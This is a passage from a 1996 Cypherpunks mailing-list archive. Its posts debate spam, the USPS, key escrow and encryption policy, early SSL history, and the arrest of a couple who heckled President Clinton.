> not been used to freeze terrorists' assets, deny terrorists' visas, cut off
> foreign aid to supporters of terrorist states, or halt terrorist fundraising
> in the United States. The Clinton Administration has not implemented the
> anti-terrorist research program established and funded by Congress in the
> 1990 Aviation Security Act.
> 
> [...]
> 
> Our technological edge is at risk not only because of the Clinton
> Administration's refusal to sustain an adequate investment in defense
> modernization, but also its virtual abandonment of national security-related
> export controls.  Acquisition of technology by aspiring proliferators of
> weapons of mass destruction has been irresponsibly facilitated. A Republican
> Administration will protect the American technological edge. It will do so
> by expanding investment in defense modernization, ensuring that the Defense
> Department has a key role in approving exports of militarily critical
> technology, and restoring the effectiveness of export control regimes.
> 
> [...]
> 
> The intelligence community should be our first line of defense against
> terrorism, drug trafficking, nuclear proliferation, and foreign espionage.
> Bill Clinton's neglect of our country's intelligence service is one of his
> most serious sins of omission. He has underfunded, misutilized, and
> marginalized critical intelligence missions and capabilities. No wonder his
> first appointee as Director of Central Intelligence has endorsed Bob Dole.
> The nation's security - and the personal safety of our citizens - cannot be
> placed at risk.
> 
> Effective intelligence can be expensive. But what it costs is measured in
> dollars rather than lives - an important lesson of the Gulf War. A
> Republican Administration will reverse the decline in funding for
> intelligence personnel and operations while better managing the development
> of futuristic capabilities. We will not constrain U.S. intelligence
> personnel with "politically correct"  standards that impede their ability to
> collect and act on intelligence information. We will conduct whatever
> intelligence operations are necessary to safeguard American lives against
> the terrorists who bomb our airplanes and buildings.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBMhy5wpNcNyVVy0jxAQFvgwH9FR9ZQca520mSuqhDO7OKLe6duAJAQ+HO
> FP4UPnLWJZtOrI9LvWiX5EHoqG0RtaS2FwwMuwGZQedb8YdkW4QWUw==
> =XdnD
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 23 Aug 1996 11:36:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: USPS
Message-ID: <199608230100.SAA29412@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 22 Aug 96, 8:37, Timothy C. May wrote:

> (Though I made up this last part, it represents reality. Postal
> inspectors frequently collaborate with various national and
> international authorities on matters involving pornography, fraud,
> pyramid schemes, and the sending of various sorts of contraband.
> While FedEx, UPS, Airborne, etc., may occasionally cooperate when a

I'm afraid that Fed-X would drop their drawers if presented with a 
federal warrant.  I guess you could call that co-operation.

> crime is called to their attention, I know of no cases where Federal
> Express, for example, has become a willing and leading partner in
> setting up stings.

No, I don't think they would do something like that.  
The Post Office IS just like an arm of the 
federal government, even though you would need a federal warrant in 
order to search packages.

> 
> "Postal anarchy" is already the accepted norm for e-mail.
> 
> --Tim May
> 

Can I quote you on that?

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 23 Aug 1996 09:14:20 +0800
To: nathan poznick <npoznick@Harding.edu>
Subject: Re: Husband/Wife jailed for saying Clinton SucksHusband/Wife jailed for say
In-Reply-To: <Pine.SOL.3.94.960822012737.28294B-100000@taz>
Message-ID: <Pine.SV4.3.91.960822181521.21784E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Thu, 22 Aug 1996 01:28:42 -0500 (CDT)
> From: nathan poznick <npoznick@Harding.edu>

> think of all the nuclear testing that went on during his time in office...


Nuclear testing has killed less women than the senior US Senator from 
Massachusetts.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 23 Aug 1996 11:45:13 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
In-Reply-To: <2.2.32.19960822220224.006a0ff0@labg30>
Message-ID: <Pine.GUL.3.95.960822180904.29100C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996, John Deters wrote:
> At 02:55 PM 8/22/96 +0000, Vipul Ved Prakash wrote:
> >>   1. Junkmail requires the SENDER to pay for it, not the recipient.
> >    Internet pricing models are complicated and debatable, but you surely
> >    end up paying for snail-junk-mail. Not directly, but hidden in the high
> >    first-class mail costs. More mail, more infrastructure, higher costs.
> >    This could be quite true for the net also, if we consider bandwidth
> >    costs money.
> 
> I beg to differ.  The USPS considers "junk" mail their bread-and-butter.
> Huge mailings of all manner of bulk mail (especially those that are PostNet
> barcoded by the sender) pay the bills around the Post Office.  Your "more
> mail, more infrastructure, higher costs" argument is flawed.  The post
> office has many fixed costs related to maintaining their huge presence,
> delivering to so many rural addresses.  If we had to pay a per-letter basis
> *discounting* the value provided by the infrastructure already in place
> supporting the bulk-mail handling systems, we'd be paying roughly Federal
> Express 2-day letter rates for each piece of mail (around $6.00, if memory
> serves correctly.)

True in broad outlines, but I think this $6 is exaggerated just a tad. 
Depends whether you mean the marginal cost of an unsubsidized piece of 1st
class mail given the current infrastructure, or the share of a hypothetical
1st class-only mail system, I suppose.

> I do not say this to begin yet another "Privatize the USPS" rant.

Actually, if you're a consumer-scale mailer, it's a good argument for
keeping the USPS heavily regulated. It certainly helps lubricate the flow of
free speech among individuals and small groups. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 23 Aug 1996 10:51:08 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <ae40f7c1140210049197@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960822181440.170B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Timothy C. May wrote:
> At 6:04 PM 8/21/96, Gary Howland wrote:
> >Often I'll ask a stupid question too ("Does your software work in
> >France?").  If more people did this, then they'd have to choose their
> >victims a bit more carefully in the future (assuming of course they're
> >trying to sell something).
> 
> As I said in my last message, I don't even do this--I just bounce it back
> to them.
> I see no need to "ask questions" (such as "Does it work in France?") to,
> perhaps, "establish legitimacy." If they sent it to me, I can send it back.
> Simple.

     I think that the purpose of asking a question is to consume _more_ of their 
time. If they read it, they have to decide if and how to respond. Cousme more 
of their resources. It might even be interesting to write a script that automatically
inserts a silly question (like "does it work in france") and mails it back with the
single stroke of a key. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 23 Aug 1996 10:44:55 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton SucksHusband/Wife jailed for say
In-Reply-To: <199608220141.SAA05126@idiom.com>
Message-ID: <Pine.LNX.3.93.960822182245.170D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, John C. Randolph wrote:
> > Frankly, I'd rather have a president who didn't feel the need to be 
> > protected by thugs.
> Well, wouldn't that require a president who had a clear conscience?
> I don't think we've had one of those since Eisenhower!

     Eisenhower? That recent huh?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 23 Aug 1996 11:38:28 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608212046.NAA23129@mycroft.rand.org>
Message-ID: <Pine.3.89.9608221833.A8421-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 21 Aug 1996, Jim Gillogly wrote:

> 
> "Paul S. Penrod" <furballs@netcom.com> writes:
> >Practically, it would be better to allow and promote a technological 
> >outlet for all of this, as it will never go away, so long as the medium 
> >exists.
> 
> The technological outlet already exists: polite marketers use Web pages,
> so that people who are interested in their offerings can find them using
> one of the search engines.  Market droids (get over it, dude) are
                                            ^^^^^^^^^^^^^^^^^^^
Nothing to get over. That's Ross who has the problem with the term.

> unwilling to reach only people who are interested in their products.
> 
> 	Jim Gillogly
> 	Trewesday, 29 Wedmath S.R. 1996, 20:45
> 

Web pages are only the *basis* for the outlet. By themselves, yes, they 
do provide a forum for advertisers, but the page by itself is not very 
efficient in terms of targeted demographics. That's why people get a wild 
hair and take matters into their own hands and launch spam in the hopes 
of finding the customers they thought would come flocking to them in droves.

As the number of Web pages increase dramatically, the chances of getting 
a "first hit" diminish accordingly. Most people I know have neither the 
time or patience to wade through up to two hours of web surfing to find 
something that a few well placed phone calls and 10 minutes turns up said 
product or service.

The issue is convenience, not technology. The majority of US consumers 
couldn't give a rat's ass about the Internet or the Web. They want their 
product or service and they want it now. When the Web becomes more 
convenient to use than the telephone, then you will see nirvana for 
Cybershopping. Right now that isn't happening.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Fri, 23 Aug 1996 09:20:09 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <ae40eda80f0210043236@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960822182617.15085A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Aug 1996, Timothy C. May wrote:

> But I agree that "no action" is pretty likely. "I hope you die" has been a
> time-honored insult at least since I was a kindergartner, and presumably
> for many decades prior to this. Hardly an active threat.

Yeah, well it's pretty lame as far as threats go, two key words there are 
"hope" and "die," what's missing is a time frame and intent of action.  
Everyone after all does day, that hope isn't hopeless, but it's not a 
threat either.

Silly assed our president, but then again what else can he do to prove 
himself a jerk.  As for me, I don't hope he dies, he will after all after 
many years, die of old age.  No, I hope he doesn't get elected.  That's 
what I hope. :^)  Not that I'd want Dole either. :(

How about you Tim, when are you running for prez?  Heheheh!

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 23 Aug 1996 11:12:15 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <Pine.BSF.3.91.960821225141.22767A-100000@mercury.thepoint.net>
Message-ID: <Pine.LNX.3.93.960822183458.170F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Brian Davis wrote:
> On Wed, 21 Aug 1996, jim bell wrote:
> > At 02:47 PM 8/21/96 -0400, Brian Davis wrote:
> > >On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
> > >> Rush Limbaugh reports:
> > >> That a husband and wife are being jailed for yelling to Clinton "You Suck".
> > Doesn't sound much like a "threat" to me.
> > > And the couple was arrestd for disorderly conduct by 
> > >Chicago police. 
> > It sounds to me like the Chicops were just showing their "loyalty" by 
> > sitting on somebody, not that they believed any real crime had been committed.
> Nope.  When police started to ask the couple questions, they began 
> screaming obscenities and generally causing a scene.  Chicago cops, being 
> what they are, are likely to arrest someone in that circumstance without 
> any prodding.  I'm not saying they should, but they will.

     1) Not that I have noticed. I get people around here screaming and carrying 
on 24/7, and the cops just drive by looking for teenage black kids that look 
suspicious.

     2) Funny that isn't what I got out of listening to eye witnesses on the radio.

     The woman started screaming at Herr Klinton, then the goons moved in and she 
got more agaited. Her husband told her to shut up and not say anything else until 
he got an attorney, so the SS arrested him as well. 

> > > Any possible federal charges for threatening a president 
> > >in violation of 18 U.S.C. Section 871 await a determination of the 
> > >seriousness of the statement, in context with the wife's conduct, by 
> > >prosecutors.  I predict no action.
> > But it isn't even a "threat", regardless of how "serious" it was.   The "I 
> > hope you die"  part is, presumably, a statement of fact:  She did, indeed, 
> > hope he dies.  But I don't see how hoping this can be considered a threat, 
> > or even SAYING she's hoping this is, likewise.
> The statement must be considered in context with their conduct, but as I 
> said before, I predict no action.

     Bullshit. Herr Klinton & goons desend into a crowd that _doesn't_ know they
are coming, and he starts to "press the flesh" with startled people, and one of them
starts to scream at him, that is not a death threat (especially given the political 
nature of what she was screaming. If she had said something like "I am going to kick
your ass", that would be a threat.). 

> > Frankly, I'd rather have a president who didn't feel the need to be 
> > protected by thugs.
> That's because you like dead Presidents. 

     Funny, Miterand (sp?) used to wander around the streets of Paris with just one
or two body guards. 

     Besides, I like dead presidents. The more of them I have, the better.
 
     <cue Ice-T "All I love is Dope & Dead presidents...">

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Thu, 22 Aug 1996 17:16:37 +0800
To: cypherpunks@toad.com
Subject: SSL: The early days
Message-ID: <84069694413671@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to find information about the early days of SSL for a paper 
I'm writing, but I'm finding that someone's comment about the net having a 
collective memory of about 12 months seems to be true - there doesn't seem to 
be anything available going back more than a year or so.  In particular I'm 
interested in:
 
- Why/how/when did Netscape decide on SSL?
- How long did it take to design the first version?
- I've heard a rumour that when it was first presented at a conference, two 
  people independantly broke it before the speaker sat down.  Is this true, 
  and what conference was it?
 
The later work on SSL (an open design process, contributions from 
cryptographers and security experts, IETF standards-track work, etc etc) is 
well documented, but information on earlier work is hard to find.  Does anyone 
have any pointers to information I could work from?
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 23 Aug 1996 13:06:33 +0800
To: furballs@netcom.com>
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608230233.TAA01338@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 22 Aug 96, 18:27, Paul S. Penrod wrote:
On Wed, 21 Aug 1996, Jim Gillogly wrote:
> "Paul S. Penrod" <furballs@netcom.com> writes:

> > find them using one of the search engines.  Market droids (get
> > over it, dude) are
>> > Nothing to get over. That's Ross who has the problem with the term.

I'm over it.  Hell, I can't even remember which side of this issue I'm 
on. ;-)   Oh, yeah...  I'm a sales-droid, looking for customers like 
a shark...  Never stop moving.....   Feed on the weak....   Yeah, 
that's where I'm at, yeah...

Anyway, the consensus is that what I'm doing (that I thought WAS 
spam) is about as harmless as a cold call, so I'm personally 
vindicated.

I like this next part:

> The issue is convenience, not technology. The majority of US
> consumers couldn't give a rat's ass about the Internet or the Web.
> They want their product or service and they want it now. When the
> Web becomes more convenient to use than the telephone, then you will
> see nirvana for Cybershopping. Right now that isn't happening.

I'm doing O.K., but I've go a product everyone still needs...  And 
the consumers I want have been on the Internet for a long, long time.
So all you geeky programmers (I mean that in the nicest way) buy your
stuff from ME!!!!  
Hey!!!  Was that SPAM!!!!  HEY!!!!!

Ross (Sales Droid) Wright

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Fri, 23 Aug 1996 10:36:50 +0800
To: cypherpunks@toad.com
Subject: (fwd) ANNOUNCE: Free Little PGP Credit Card App
Message-ID: <199608222354.TAA21158@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: "David j. Sopuch" <djs@iwinpak.com>
Newsgroups: comp.infosystems.www.misc
Subject: ANNOUNCE: Free Little PGP Credit Card App
Date: Thu, 22 Aug 1996 12:00:24 -0400
Organization: Datamax Research corp.
Lines: 10
Message-ID: <321C8418.2647@iwinpak.com>

v2.08 of the iWinpak Internet Payment System is now available in
both freeware and shareware versions at http://www.iwinpak.com

Dave
-- 
http://www.iwinpak.com
Try the iWinpak Internet Payment System - the Free little PGP Credit Card 
app
***      PageCommerce (tm) - the $99 No Server PGP Commerce Solution     
 ***

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
Living in dread with your fragile brain and the executioner's got your number
 I feel a groove comin' on            -:-             Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Fri, 23 Aug 1996 14:19:05 +0800
To: cypherpunks@toad.com
Subject: Racists Speak Up For Crypto
Message-ID: <199608230353.UAA23980@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 22 Aug 1996 15:28:48 -0700
From: ezundel@cts.com (E. Zndel)

Good Morning from the Zundelsite:

I have a sweet friend in Santa Barbara, California who grew up with me in
the rain forests of South America.  Elvira and I share many things,
including an "encryption language" of sorts.  We used it with relish as
teenagers when the Mennonite Elders were spying on us, trying to ferret out
secrets.

The key was really very simple, but our "government" just never  managed to
catch on.  It used to drive them wild.  Yet it was so ridiculously simple -
". . . repeat a vowel with a 'b'".

Prebesibidebent Clibintobon?

Kapish?

Just practice it a bit - no one will understands it!  It is hilarious.  It
gave us a tremendous edge on wickedness - mostly romantic wickedness but
now and then legitimate revolt against authority peddling a dogma we didn't
always like.

This story often comes to mind as I peruse the arguments regarding
censorship, particularly as I was reading a recent Phyllis Schlafly's essay
on "Clinton Is Trying to be Big Brother":

". . . We hope the appropriate government agencies will soon solve the
recent terrorist crimes and punish the criminals. But all Americans who
care about civil liberties should vigorously resist President Clinton's
attempt to use the terrorist attacks as an excuse to carry on his all-out
war against the personal privacy of law-abiding Americans.

Now the Clinton Administration is trying to make it illegal for individual
Americans to have private conversations with one another. That's the real
meaning of its effort to control encryption technology, and it's a direct
assault on the First Amendment.

It would be downright ridiculous to assert that the First Amendment
guarantees our right to speak in public but not in private. It would be
just as ridiculous to say that we have freedom to speak in words that the
government can understand, but not in words the government can't decipher.

Americans have the right to speak to one another in private, behind closed
doors, and we should likewise have the right to speak to one another in
code and to put our coded messages on computer in a process called
encryption. Americans would not tolerate the government opening and reading
the letters we send through the mails, and we should not tolerate the
government opening and reading our encrypted, or coded, messages sent via
computer.

Yet, Attorney General Janet Reno, FBI Director Louis Freeh, and Vice
President Al Gore are all demanding the authority to read our encrypted
messages. In a speech to the Commonwealth Club of California, Reno bluntly
stated her demand for "ensuring law enforcement access to encrypted data.''

Reno boasted that there is "a consensus'' that the government should create
a system known as "Key Escrow'' (i.e., a supposedly "neutral third
party''), to which all Americans should be forced to "entrust'' the keys to
their encrypted messages, and to which the government would have access. On
the contrary, there is no such consensus.

Do you trust Janet Reno with access to your private messages? Do you trust
the FBI to keep your files confidential?

On July 12, Al Gore announced that the Administration will continue to push
for the adoption of a massive public key infrastructure to give the
government access to all encrypted communications. In a blatant bid for a
police-state surveillance society, Gore warned about "the dangers of
unregulated encryption technology."

A neutral panel of the National Research Council was set up to make policy
recommendations about encryption. The panel called on the government to
abandon its efforts to restrict encryption.

The NSC panel concluded that increased use of encryption would enhance our
national security, not diminish it. Thirteen out of its 16 members had
security clearances with access to secret information, and they saw no
national security reason to justify the Clinton policy.

The Clinton Administration bases its campaign to control private encryption
on the alleged need to fight crime through wiretapping. However, the NSC
panel concluded that the ability of the private sector to transfer
confidential financial and other data over the information highway without
interception is far more important.

Encryption is a First Amendment issue, not a crime issue. If the Clinton
Administration is allowed to control encryption, it would be the biggest
expansion of federal power since the passage of the Income Tax Amendment in
1913 . . ."

And come to think of it, still after all these years: the Elders had no
business whatsoever spying on some teenagers.  They made the laws, and they
enforced the laws, and it was pretty much authoritarian business, but even
as young teenagers we knew that what they did was Trespass!

They had their reasons - but we had ours!  It was called privacy.
Nebeveber lebet aba foobool kibiss youbou obor aba kibiss foobool youbou!

Advice to the wise in these perilous times.

Ingrid

Thought for the Day:

"All the fun's in how you say a thing."

(Robert Frost)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 23 Aug 1996 14:46:26 +0800
To: Scottauge@aol.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608230440.VAA17008@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:26 PM 8/22/96 -0400, pjb@ny.ubs.com wrote:
>perhaps we should all add a line to our sigs to the effect that we hope
>he dies, and soon, natural causes, of course. Hmmm, what exactly does 
>'natural death' include?
>	-paul

A friend of mine who's an occasional hunter, and I were watching one of 
those nature-shows, and as I recall they showed a deer escaping from some 
sort of predator.  The show's voice-over said that with the coming winter, 
the deer escaped "and would die a natural death."  My friend indignantly 
pointed out that in NATURE, getting eaten by a predator IS A NATURAL DEATH!

In a sense, for example, being in an airplane crash is "a natural death," 
because gravity is entirely natural!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Fri, 23 Aug 1996 16:11:52 +0800
To: cypherpunks@toad.com
Subject: 128 bit MS Internet Explorer
Message-ID: <199608230442.VAA20423@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    MS got their site, www.microsoft.com, straightened out. I was able
    to download with about the same form filling as required for
    Netscape 3.0.

    b




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Barnett <marc@mtjeff.com>
Date: Fri, 23 Aug 1996 15:20:41 +0800
To: cypherpunks@toad.com
Subject: Antiautomobile devices
Message-ID: <199608230512.WAA06081@beowulf.got.net>
MIME-Version: 1.0
Content-Type: text/plain


This was recently posted to ba.motorcycle (WHY, I dunno), and since there
has already been the topic regarding EMP disabling of cars....


From: keethie@iguanabbs.com (Keith P. Keber)
Subject: Wussy EMP Devices...
Date: 21 Aug 1996 14:27:14 GMT

So, LEOs in the US of A will disable fleeing autos with electricity, eh? They
ought to get a clue from those icons of enforcement in Finland.

Finnish police agencies have been beta-testing a new device that fits on the
front of their police cars. It's a harpoon. That's right, a harpoon. During a
high-speed chase, the cops ram the sharpened, front-mounted device through
the body, into the trunk of the car they are chasing. Barbs spring out,
preventing dislodgement. The police car then uses its own brakes to bring
both cars to a halt. The kicker is that the harpoon is really a giant
hypodermic needle; tear gas can be injected through it into the vehicle
ahead. 

(I can just hear some lawn order types now: "Whoa! Cool, man!")

This story comes from the 8/20/96 broadcast of Public Radio International's
program, "The World", which claimed the device was being demonstrated at some
airport in Finland.

They didn't say what would happen if the suspects decided to lock up their
brakes just as the pursuing vehicle rammed them, but they *did* advise
listeners to obey all speed limits while visiting the country....:-)

----------------

This is why I like my new bike...

-- 
Marc                                     I'M A FREAK, TOUCH ME
marc@mtjeff.com           A mind is a wonderful thing to taste







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "steven ryan" <sryan@reading.com>
Date: Fri, 23 Aug 1996 12:48:09 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks the video
Message-ID: <2.2.32.19960823023300.0071c9f0@reading.com>
MIME-Version: 1.0
Content-Type: text/plain


There was talk earlier about someone putting together a Cypherpunks video.
What ever came of that? I now have access to an Avid nonlinear digital
editor and would be interested in pursueing this.

Steven
------------------------------------
Steven Ryan - Reading Access - sryan@reading.com
PGP Fingerprint: E8 A2 C5 A2  7A C4 77 93  0A 1B 1D C6  B9 2F 36 9B
Finger me for my PGP public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 23 Aug 1996 13:02:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: USPS
In-Reply-To: <ae422fd400021004704e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960822221126.16732B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



The USPS does have a role in the world of e-commerce, but I think it's 
likely to be much less than they think. Bilateral agreements are often 
more efficient for long-term work, but for general one-off transactions, 
it's cheaper to have a _small_ number of commonly trusted third parties.

For this reason, I think it would make a lot of sense to have DMVs serve 
as certification agencies (a role they fill today).

You don't necessarily have to trust them any more than you trust a 
drivers licence for applications where 100% certaintiy is what you need, 
but for your typical commercial situation it'll do fine. 

Simon.

p.s. 
 has anyone done any studies on the cost of making different kind of 
trust decisions (both of the 'trust a CA' and various orders of the web 
of trust model? (i.e. trust as introducer^n) 



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 23 Aug 1996 13:58:14 +0800
To: "null@void.com>
Subject: Re: forget photographing license plates!
In-Reply-To: <19960818051206140.AAC174@IO-ONLINE.COM>
Message-ID: <v03007800ae42dab21a3e@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Aug 96 01:31:08 -0800, null@void.com wrote:

>"In the 22 Jul 1996 issue of Fortune was an interesting look into the future
>of automobile electronics, "Soon Your Dashboard Will Do Everything (Except
>Steer)".  "
>From the control center, they can "electronically reach into the car" to
>unlock the doors, or honk the horn and flash its lights."

>It is extremely comforting to me -- I don't know about you -- to think
>that GM will maintain a control center able to communicate with my auto
>>electronics.  Shit, why not TRW?

Why, when I read this, do I keep getting flashes of Kirk&Co hacking into
Kahn's Shipboard Computers to get it to drop the Ship's shields <g>?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 23 Aug 1996 14:06:15 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: forget photographing license plates!
In-Reply-To: <19960818051206140.AAC174@IO-ONLINE.COM>
Message-ID: <v03007801ae42dbed6452@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:19 -0500 8/18/96, Douglas R. Floyd wrote:


>>
>> I'm just waiting for them to integrate with TRW. Then, with people
>> they've determined can afford a new one, they can trigger the car to have
>> mysterious engine failures...
>
>Or the minute one falls behind on their bill, the engine doesn't start.
>
>This is legal, IIRC (I am not sure of the exact court case, but one
>company had a software vendor disable their sales software by remote for
>not paying their bill, and the court upheld the software vendor.  I don't
>remember the specifics on this.)

Neither do I (exactly) but it was one of those cases where the program was
leased for a period of time and was not to be used after this unless the
new lease was paid. Normally, these types of programs start printing
Count-Down warnings as the expiration date nears and the customer is
supposed to enter a code (supplied by the vendor after paying for the
extension of the lease) into the program to keep it running. I do not
remember if the program was issuing this type of warning or not. I think
that the court case was due to the way that the vendor crippled it for
non-payment not the fact that it was done (since the Time Bomb code was
standard industry practice and they just logged into the program to cripple
it instead of just having it refuse to run after the trigger date).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 23 Aug 1996 14:02:53 +0800
To: Michelle KC5KYO <mthompso@qualcomm.com>
Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
In-Reply-To: <9607218406.AA840670454@smtplink.alis.ca>
Message-ID: <v03007802ae42df422cb3@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:58 -0700 8/21/96, Michelle KC5KYO wrote:


>> I do not believe that freedom of speech in the U.S.A. extends to actively
>> agitating for secession or the overthrow of the federal government.
>
>The right to discuss revolt or secession or the overthrow of the federal
>government, it seems to me, is given below:
>
>"We hold these Truths to be self-evident, that all Men are created
>equal, that they are endowed by their Creator with certain unalienable
>Rights, that among these are Life, Liberty, and the Pursuit of
>Happiness - That to secure these Rights, Governments are instituted
>among Men, deriving their just Powers from the Consent of the
>Governed, that whenever any Form of Government becomes destructive of
>these Ends, it is the Right of the People to alter or to abolish it,
>and to institute new Government, laying its Foundation on such
>Principles, and organizing its Powers in such Form, as to them shall
>seem most likely to effect their Safety and Happiness.  ... "
>
>Now this is the Declaration of Independence, and not the Constitution, but
>it seems to me that the right to discuss "agitating for secession or the
>overthrow of the federal government" is protected.
>
>Michelle

Unfortunately, this went out the window about 130-135 years ago during the
5 year period sometimes called "The Late Unpleasantness" <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 23 Aug 1996 08:39:10 +0800
To: cypherpunks@toad.com
Subject: Re: U.S. Army Private Faces Spying Charges
In-Reply-To: <9608221711.AA00368@bksmp2.FRB.GOV>
Message-ID: <321CD0C2.4487EB71@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas C. Allard wrote:
> 
> His father said an Army major at Fort Bragg, whom he declined to name,
> had urged him to persuade his son to sign a confession, so prosecutors
> would not seek the death penalty.

Isn't plea bargaining wonderful?

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
